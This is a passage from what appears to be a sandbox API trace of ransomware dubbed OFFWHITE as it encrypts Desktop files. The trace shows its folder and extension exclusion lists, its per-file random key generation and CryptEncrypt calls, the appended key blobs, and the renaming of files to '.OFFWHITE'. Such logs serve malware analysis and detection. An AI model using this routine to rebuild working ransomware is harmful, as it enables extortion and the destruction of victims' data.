ftLastAccessTime.dwLowDateTime=0xb9ebb540, ftLastAccessTime.dwHighDateTime=0x1d62251, ftLastWriteTime.dwLowDateTime=0xb9ebb540, ftLastWriteTime.dwHighDateTime=0x1d62251, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x295f6f0, cFileName="Desktop", cAlternateFileName="")) returned 1 [0131.872] lstrcmpiW (lpString1="Desktop", lpString2=".") returned 1 [0131.872] lstrcmpiW (lpString1="Desktop", lpString2="..") returned 1 [0131.872] lstrcmpiW (lpString1="Desktop", lpString2="...") returned 1 [0131.872] lstrcmpiW (lpString1="Desktop", lpString2="windows") returned -1 [0131.872] lstrcmpiW (lpString1="Desktop", lpString2="$recycle.bin") returned 1 [0131.872] lstrcmpiW (lpString1="Desktop", lpString2="rsa") returned -1 [0131.873] lstrcmpiW (lpString1="Desktop", lpString2="ntuser.dat") returned -1 [0131.873] lstrcmpiW (lpString1="Desktop", lpString2="programdata") returned -1 [0131.873] lstrcmpiW (lpString1="Desktop", lpString2="appdata") returned 1 [0131.873] lstrcmpiW (lpString1="Desktop", lpString2="program files") returned -1 [0131.873] lstrcmpiW (lpString1="Desktop", lpString2="program files (x86)") returned -1 [0131.873] lstrcpyW (in: lpString1=0x295ee68, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\" [0131.873] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\", lpString2="Desktop" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop" [0131.873] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpString2="\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" [0131.873] lstrcpyW (in: lpString1=0x295e9f0, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" [0131.873] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpString2="*.*" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*.*") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*.*" [0131.873] FindFirstFileW (in: lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*.*", lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb9ebb540, ftLastAccessTime.dwHighDateTime=0x1d62251, ftLastWriteTime.dwLowDateTime=0xb9ebb540, ftLastWriteTime.dwHighDateTime=0x1d62251, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x440042, dwReserved1=0x295f070, cFileName=".", cAlternateFileName="")) returned 0x544610 [0131.873] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0131.873] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb9ebb540, ftLastAccessTime.dwHighDateTime=0x1d62251, ftLastWriteTime.dwLowDateTime=0xb9ebb540, ftLastWriteTime.dwHighDateTime=0x1d62251, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x440042, dwReserved1=0x295f070, cFileName="..", cAlternateFileName="")) returned 1 [0131.873] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0131.874] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0131.874] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf9db3b80, ftCreationTime.dwHighDateTime=0x1d5da9e, ftLastAccessTime.dwLowDateTime=0x41f17f50, ftLastAccessTime.dwHighDateTime=0x1d5db9a, ftLastWriteTime.dwLowDateTime=0x41f17f50, ftLastWriteTime.dwHighDateTime=0x1d5db9a, nFileSizeHigh=0x0, nFileSizeLow=0x4810, dwReserved0=0x440042, dwReserved1=0x295f070, cFileName="2t8A7p6OhuLdYQgit MB.pps", cAlternateFileName="2T8A7P~1.PPS")) returned 1 [0131.874] lstrcmpiW (lpString1="2t8A7p6OhuLdYQgit MB.pps", lpString2=".") returned 1 [0131.874] lstrcmpiW (lpString1="2t8A7p6OhuLdYQgit MB.pps", lpString2="..") returned 1 [0131.874] lstrcmpiW (lpString1="2t8A7p6OhuLdYQgit MB.pps", lpString2="...") returned 1 [0131.874] lstrcmpiW (lpString1="2t8A7p6OhuLdYQgit MB.pps", lpString2="windows") returned -1 [0131.874] lstrcmpiW (lpString1="2t8A7p6OhuLdYQgit MB.pps", lpString2="$recycle.bin") returned 1 [0131.874] lstrcmpiW (lpString1="2t8A7p6OhuLdYQgit MB.pps", lpString2="rsa") returned -1 [0131.874] lstrcmpiW (lpString1="2t8A7p6OhuLdYQgit MB.pps", lpString2="ntuser.dat") returned -1 [0131.874] lstrcmpiW (lpString1="2t8A7p6OhuLdYQgit MB.pps", lpString2="programdata") returned -1 [0131.874] lstrcmpiW (lpString1="2t8A7p6OhuLdYQgit MB.pps", lpString2="appdata") returned -1 [0131.874] lstrcmpiW (lpString1="2t8A7p6OhuLdYQgit MB.pps", lpString2="program files") returned -1 [0131.874] lstrcmpiW (lpString1="2t8A7p6OhuLdYQgit MB.pps", lpString2="program files (x86)") returned -1 [0131.874] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" [0131.874] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpString2="2t8A7p6OhuLdYQgit MB.pps" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\2t8A7p6OhuLdYQgit MB.pps") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\2t8A7p6OhuLdYQgit MB.pps" [0131.874] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0131.874] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0131.874] PathFindExtensionW (pszPath="2t8A7p6OhuLdYQgit MB.pps") returned=".pps" [0131.874] lstrcmpiW (lpString1=".pps", lpString2=".exe") returned 1 [0131.874] lstrcmpiW (lpString1=".pps", lpString2=".log") returned 1 [0131.874] lstrcmpiW (lpString1=".pps", lpString2=".cab") returned 1 [0131.875] lstrcmpiW (lpString1=".pps", lpString2=".cmd") returned 1 [0131.875] lstrcmpiW (lpString1=".pps", lpString2=".com") returned 1 [0131.875] lstrcmpiW (lpString1=".pps", lpString2=".cpl") returned 1 [0131.875] lstrcmpiW (lpString1=".pps", lpString2=".ini") returned 1 [0131.875] lstrcmpiW (lpString1=".pps", lpString2=".dll") returned 1 [0131.875] lstrcmpiW (lpString1=".pps", lpString2=".url") returned -1 [0131.875] lstrcmpiW (lpString1=".pps", lpString2=".ttf") returned -1 [0131.875] lstrcmpiW (lpString1=".pps", lpString2=".mp3") returned 1 [0131.875] lstrcmpiW (lpString1=".pps", lpString2=".pif") returned 1 [0131.875] lstrcmpiW (lpString1=".pps", lpString2=".mp4") returned 1 [0131.875] lstrcmpiW (lpString1=".pps", lpString2=".OFFWHITE") returned 1 [0131.875] lstrcmpiW (lpString1=".pps", lpString2=".msi") returned 1 [0131.875] lstrcmpiW (lpString1="2t8A7p6OhuLdYQgit MB.pps", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0131.875] GetProcessHeap () returned 0x500000 [0131.875] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x547e58 [0131.875] CreateFileW (lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\2t8A7p6OhuLdYQgit MB.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\2t8a7p6ohuldyqgit mb.pps"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb0 [0131.876] GetFileSizeEx (in: hFile=0xb0, lpFileSize=0x295e560 | out: lpFileSize=0x295e560*=18448) returned 1 [0131.876] GetProcessHeap () returned 0x500000 [0131.876] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487a8 [0131.876] GetProcessHeap () returned 0x500000 [0131.876] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487c0 [0131.876] GetProcessHeap () returned 0x500000 [0131.876] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5242b0 [0131.876] GetProcessHeap () returned 0x500000 [0131.876] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5243b8 [0131.876] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0131.876] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0131.876] SystemFunction036 (in: RandomBuffer=0x5487a8, RandomBufferLength=0x10 | out: RandomBuffer=0x5487a8) returned 1 [0131.876] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0131.876] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0131.876] SystemFunction036 (in: RandomBuffer=0x5487c0, RandomBufferLength=0x10 | out: RandomBuffer=0x5487c0) returned 1 [0131.876] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0131.876] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0131.877] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5242b0*, pdwDataLen=0x295e310*=0x10, dwBufLen=0x100 | out: pbData=0x5242b0*, pdwDataLen=0x295e310*=0x100) returned 1 [0131.877] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0131.877] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0131.877] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5243b8*, pdwDataLen=0x295e30c*=0x10, dwBufLen=0x100 | out: pbData=0x5243b8*, pdwDataLen=0x295e30c*=0x100) returned 1 [0131.877] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x4810, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0131.877] SetLastError (dwErrCode=0x0) [0131.877] WriteFile (in: hFile=0xb0, lpBuffer=0x5242b0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5242b0*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0131.880] GetLastError () returned 0x0 [0131.880] GetLastError () returned 0x0 [0131.880] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x4910, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0131.880] WriteFile (in: hFile=0xb0, lpBuffer=0x5243b8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5243b8*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0131.880] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x4a10, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0131.880] WriteFile (in: hFile=0xb0, lpBuffer=0x547e58*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x547e58*, lpNumberOfBytesWritten=0x295e54c*=0x8, lpOverlapped=0x0) returned 1 [0131.880] GetProcessHeap () returned 0x500000 [0131.880] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x4810) returned 0x5557b0 [0131.880] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0131.880] ReadFile (in: hFile=0xb0, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x4810, lpNumberOfBytesRead=0x295e540, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295e540*=0x4810, lpOverlapped=0x0) returned 1 [0131.882] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0131.882] WriteFile (in: hFile=0xb0, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x4810, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295e54c*=0x4810, lpOverlapped=0x0) returned 1 [0131.882] GetProcessHeap () returned 0x500000 [0131.883] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0131.883] CloseHandle (hObject=0xb0) returned 1 [0131.886] GetProcessHeap () returned 0x500000 [0131.886] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5242b0 | out: hHeap=0x500000) returned 1 [0131.886] GetProcessHeap () returned 0x500000 [0131.886] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5243b8 | out: hHeap=0x500000) returned 1 [0131.886] GetProcessHeap () returned 0x500000 [0131.886] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487a8 | out: hHeap=0x500000) returned 1 [0131.886] GetProcessHeap () returned 0x500000 [0131.886] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487c0 | out: hHeap=0x500000) returned 1 [0131.886] lstrcpyW (in: lpString1=0x295e338, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\2t8A7p6OhuLdYQgit MB.pps" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\2t8A7p6OhuLdYQgit MB.pps") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\2t8A7p6OhuLdYQgit MB.pps" [0131.886] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\2t8A7p6OhuLdYQgit MB.pps", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\2t8A7p6OhuLdYQgit MB.pps.OFFWHITE") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\2t8A7p6OhuLdYQgit MB.pps.OFFWHITE" [0131.886] MoveFileW (lpExistingFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\2t8A7p6OhuLdYQgit MB.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\2t8a7p6ohuldyqgit mb.pps"), lpNewFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\2t8A7p6OhuLdYQgit MB.pps.OFFWHITE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\2t8a7p6ohuldyqgit mb.pps.offwhite")) returned 1 [0131.888] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf2e77550, ftCreationTime.dwHighDateTime=0x1d5df3a, ftLastAccessTime.dwLowDateTime=0x5ed59ac0, ftLastAccessTime.dwHighDateTime=0x1d5e045, ftLastWriteTime.dwLowDateTime=0x5ed59ac0, ftLastWriteTime.dwHighDateTime=0x1d5e045, nFileSizeHigh=0x0, nFileSizeLow=0x7b57, dwReserved0=0x440042, dwReserved1=0x295f070, cFileName="2thqMTymHIZmNW2kG.mp3", cAlternateFileName="2THQMT~1.MP3")) returned 1 [0131.888] lstrcmpiW (lpString1="2thqMTymHIZmNW2kG.mp3", lpString2=".") returned 1 [0131.888] lstrcmpiW (lpString1="2thqMTymHIZmNW2kG.mp3", lpString2="..") returned 1 [0131.888] lstrcmpiW (lpString1="2thqMTymHIZmNW2kG.mp3", lpString2="...") returned 1 [0131.888] lstrcmpiW (lpString1="2thqMTymHIZmNW2kG.mp3", lpString2="windows") returned -1 [0131.888] lstrcmpiW (lpString1="2thqMTymHIZmNW2kG.mp3", lpString2="$recycle.bin") returned 1 [0131.888] lstrcmpiW (lpString1="2thqMTymHIZmNW2kG.mp3", lpString2="rsa") returned -1 [0131.888] lstrcmpiW (lpString1="2thqMTymHIZmNW2kG.mp3", lpString2="ntuser.dat") returned -1 [0131.888] lstrcmpiW (lpString1="2thqMTymHIZmNW2kG.mp3", lpString2="programdata") returned -1 [0131.888] lstrcmpiW (lpString1="2thqMTymHIZmNW2kG.mp3", lpString2="appdata") returned -1 [0131.888] lstrcmpiW (lpString1="2thqMTymHIZmNW2kG.mp3", lpString2="program files") returned -1 [0131.888] lstrcmpiW (lpString1="2thqMTymHIZmNW2kG.mp3", lpString2="program files (x86)") returned -1 [0131.888] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" [0131.888] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpString2="2thqMTymHIZmNW2kG.mp3" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\2thqMTymHIZmNW2kG.mp3") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\2thqMTymHIZmNW2kG.mp3" [0131.888] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0131.888] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0131.888] PathFindExtensionW (pszPath="2thqMTymHIZmNW2kG.mp3") returned=".mp3" [0131.888] lstrcmpiW (lpString1=".mp3", lpString2=".exe") returned 1 [0131.888] lstrcmpiW (lpString1=".mp3", lpString2=".log") returned 1 [0131.888] lstrcmpiW (lpString1=".mp3", lpString2=".cab") returned 1 [0131.888] lstrcmpiW (lpString1=".mp3", lpString2=".cmd") returned 1 [0131.888] lstrcmpiW (lpString1=".mp3", lpString2=".com") returned 1 [0131.888] lstrcmpiW (lpString1=".mp3", lpString2=".cpl") returned 1 [0131.888] lstrcmpiW (lpString1=".mp3", lpString2=".ini") returned 1 [0131.888] lstrcmpiW (lpString1=".mp3", lpString2=".dll") returned 1 [0131.888] lstrcmpiW (lpString1=".mp3", lpString2=".url") returned -1 [0131.888] lstrcmpiW (lpString1=".mp3", lpString2=".ttf") returned -1 [0131.888] lstrcmpiW (lpString1=".mp3", lpString2=".mp3") returned 0 [0131.889] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78d97a70, ftCreationTime.dwHighDateTime=0x1d5e4c0, ftLastAccessTime.dwLowDateTime=0x232a5650, ftLastAccessTime.dwHighDateTime=0x1d5da00, ftLastWriteTime.dwLowDateTime=0x232a5650, ftLastWriteTime.dwHighDateTime=0x1d5da00, nFileSizeHigh=0x0, nFileSizeLow=0xd10e, dwReserved0=0x440042, dwReserved1=0x295f070, cFileName="4IYwkdk1gj 2DR.mkv", cAlternateFileName="4IYWKD~1.MKV")) returned 1 [0131.889] lstrcmpiW (lpString1="4IYwkdk1gj 2DR.mkv", lpString2=".") returned 1 [0131.889] lstrcmpiW (lpString1="4IYwkdk1gj 2DR.mkv", lpString2="..") returned 1 [0131.889] lstrcmpiW (lpString1="4IYwkdk1gj 2DR.mkv", lpString2="...") returned 1 [0131.889] lstrcmpiW (lpString1="4IYwkdk1gj 2DR.mkv", lpString2="windows") returned -1 [0131.889] lstrcmpiW (lpString1="4IYwkdk1gj 2DR.mkv", lpString2="$recycle.bin") returned 1 [0131.889] lstrcmpiW (lpString1="4IYwkdk1gj 2DR.mkv", lpString2="rsa") returned -1 [0131.889] lstrcmpiW (lpString1="4IYwkdk1gj 2DR.mkv", lpString2="ntuser.dat") returned -1 [0131.889] lstrcmpiW (lpString1="4IYwkdk1gj 2DR.mkv", lpString2="programdata") returned -1 [0131.889] lstrcmpiW (lpString1="4IYwkdk1gj 2DR.mkv", lpString2="appdata") returned -1 [0131.889] lstrcmpiW (lpString1="4IYwkdk1gj 2DR.mkv", lpString2="program files") returned -1 [0131.889] lstrcmpiW (lpString1="4IYwkdk1gj 2DR.mkv", lpString2="program files (x86)") returned -1 [0131.889] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" [0131.889] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpString2="4IYwkdk1gj 2DR.mkv" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\4IYwkdk1gj 2DR.mkv") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\4IYwkdk1gj 2DR.mkv" [0131.889] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0131.889] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0131.889] PathFindExtensionW (pszPath="4IYwkdk1gj 2DR.mkv") returned=".mkv" [0131.889] lstrcmpiW (lpString1=".mkv", lpString2=".exe") returned 1 [0131.889] lstrcmpiW (lpString1=".mkv", lpString2=".log") returned 1 [0131.889] lstrcmpiW (lpString1=".mkv", lpString2=".cab") returned 1 [0131.889] lstrcmpiW (lpString1=".mkv", lpString2=".cmd") returned 1 [0131.889] lstrcmpiW (lpString1=".mkv", lpString2=".com") returned 1 [0131.889] lstrcmpiW (lpString1=".mkv", lpString2=".cpl") returned 1 [0131.889] lstrcmpiW (lpString1=".mkv", lpString2=".ini") returned 1 [0131.889] lstrcmpiW (lpString1=".mkv", lpString2=".dll") returned 1 [0131.889] lstrcmpiW (lpString1=".mkv", lpString2=".url") returned -1 [0131.890] lstrcmpiW (lpString1=".mkv", lpString2=".ttf") returned -1 [0131.890] lstrcmpiW (lpString1=".mkv", lpString2=".mp3") returned -1 [0131.890] lstrcmpiW (lpString1=".mkv", lpString2=".pif") returned -1 [0131.890] lstrcmpiW (lpString1=".mkv", lpString2=".mp4") returned -1 [0131.890] lstrcmpiW (lpString1=".mkv", lpString2=".OFFWHITE") returned -1 [0131.890] lstrcmpiW (lpString1=".mkv", lpString2=".msi") returned -1 [0131.890] lstrcmpiW (lpString1="4IYwkdk1gj 2DR.mkv", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0131.890] GetProcessHeap () returned 0x500000 [0131.890] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x547e68 [0131.890] CreateFileW (lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\4IYwkdk1gj 2DR.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\4iywkdk1gj 2dr.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb0 [0131.891] GetFileSizeEx (in: hFile=0xb0, lpFileSize=0x295e560 | out: lpFileSize=0x295e560*=53518) returned 1 [0131.891] GetProcessHeap () returned 0x500000 [0131.891] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487c0 [0131.891] GetProcessHeap () returned 0x500000 [0131.891] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487a8 [0131.891] GetProcessHeap () returned 0x500000 [0131.891] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5243b8 [0131.891] GetProcessHeap () returned 0x500000 [0131.891] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5242b0 [0131.891] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0131.891] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0131.891] SystemFunction036 (in: RandomBuffer=0x5487c0, RandomBufferLength=0x10 | out: RandomBuffer=0x5487c0) returned 1 [0131.891] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0131.891] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0131.891] SystemFunction036 (in: RandomBuffer=0x5487a8, RandomBufferLength=0x10 | out: RandomBuffer=0x5487a8) returned 1 [0131.891] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0131.891] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0131.891] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5243b8*, pdwDataLen=0x295e310*=0x10, dwBufLen=0x100 | out: pbData=0x5243b8*, pdwDataLen=0x295e310*=0x100) returned 1 [0131.891] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0131.891] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0131.891] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5242b0*, pdwDataLen=0x295e30c*=0x10, dwBufLen=0x100 | out: pbData=0x5242b0*, pdwDataLen=0x295e30c*=0x100) returned 1 [0131.892] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xd10e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0131.892] SetLastError (dwErrCode=0x0) [0131.892] WriteFile (in: hFile=0xb0, lpBuffer=0x5243b8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5243b8*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0131.900] GetLastError () returned 0x0 [0131.900] GetLastError () returned 0x0 [0131.900] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xd20e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0131.900] WriteFile (in: hFile=0xb0, lpBuffer=0x5242b0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5242b0*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0131.900] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xd30e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0131.900] WriteFile (in: hFile=0xb0, lpBuffer=0x547e68*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x547e68*, lpNumberOfBytesWritten=0x295e54c*=0x8, lpOverlapped=0x0) returned 1 [0131.900] GetProcessHeap () returned 0x500000 [0131.900] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0xd10e) returned 0x5557b0 [0131.900] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0131.900] ReadFile (in: hFile=0xb0, lpBuffer=0x5557b0, nNumberOfBytesToRead=0xd10e, lpNumberOfBytesRead=0x295e540, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295e540*=0xd10e, lpOverlapped=0x0) returned 1 [0131.904] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0131.905] WriteFile (in: hFile=0xb0, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0xd10e, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295e54c*=0xd10e, lpOverlapped=0x0) returned 1 [0131.905] GetProcessHeap () returned 0x500000 [0131.905] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0131.905] CloseHandle (hObject=0xb0) returned 1 [0131.913] 